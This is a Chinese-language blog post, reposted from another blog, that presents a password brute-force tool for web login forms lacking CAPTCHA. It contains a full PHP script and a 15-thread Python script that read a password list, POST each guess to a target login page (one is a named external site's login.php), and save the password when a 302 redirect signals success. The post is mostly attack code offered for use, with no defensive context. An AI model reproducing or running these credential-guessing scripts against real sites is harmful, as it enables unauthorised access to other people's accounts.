Ψ小川Ψ dě Blog

Home » » 无验证码web爆破工具

无验证码web爆破工具

转自:Return Blogs: www.creturn.com

 

PHP版本

<?php

set_time_limit(0);
$pwd = 'password/pwdt.txt'; //密码文件
$rhost = 'http://127.0.0.1/test/test.php'; //POST数据地址
$file = fopen($pwd, 'r');//初始化文件句柄
$curl = curl_init();//初始化

//设置参数

curl_setopt($curl, CURLOPT_URL, $rhost);//设置目标地址
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);//设置接收反馈内容
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_POST, 1);//设置提交方式为POST

while (!feof($file)){

 $fpwd = trim(fgets($file));

 $post_data = array('password'=>$fpwd); //POST提交数据
 curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
 //执行提交内容
 curl_exec($curl);
 //获取状态反馈信息组
 $rsinfo = curl_getinfo($curl);
 if(intval($rsinfo['http_code'])== 302){
 file_put_contents('pwd.txt', $fpwd);
 echo '密码是:'.$fpwd.'已经保存到pwd.txt文件中';
 return ;
 }

}
//关闭资源接口
curl_close($curl);
//关闭文件句柄释放资源
fclose($file);

Python 模拟多线程版本:

#/usr/bin python
# -*- coding: utf-8-*-
# create data:2012.6.20 By:Return

import httplib,urllib
import threading
import Queue
queue=Queue.Queue() #创建任务队列
class ThreadUrl(threading.Thread):
 def __init__(self,queue):
 threading.Thread.__init__(self)
 self.queue=queue
 def run(self):
 while True:
 try:
 if(Queue.Empty):
 pwd=self.queue.get() #从队列中获取密码
 else:
 break
 params = urllib.urlencode({'password':pwd}) #提交的数据

headers = {"Content-Type":"application/x-www-form-urlencoded",

"Connection":"Keep-Alive"}

#HTTP连接建立,连接地址为你要爆破的目标地址
 conn = httplib.HTTPConnection('game.creturn.net')
 # url参数为要爆破提交的POST地址
 conn.request(method="POST",url='/login.php',body=params,headers=headers)
 response = conn.getresponse()
 if response.status == 302:
 final="crack success!^_^! Password: %s"%(pwd)
 fp = open('rs.txt','a+');
 fp.write(final); #如果破解成则忘文件rs.txt写入密码
 fp.close();
 else:
 conn.close();
 except:
 print 'connect time out!'
 self.queue.task_done()

def main():
 print 'Now is creaking....';
 for i in range(15):
 t=ThreadUrl(queue)
 t.setDaemon(True)
 t.start()
 pwds = open('pwd2.txt','r').readlines(); #读取密码文件
 for pwd in pwds:
 p=pwd
 queue.put(p)
 queue.join()
if __name__ == '__main__':
 main()

 

No comment yet.

添加评论

? razz sad evil ! smile oops grin eek shock ??? cool lol mad twisted roll wink idea arrow neutral cry mrgreen mrgreen

0 + 6 =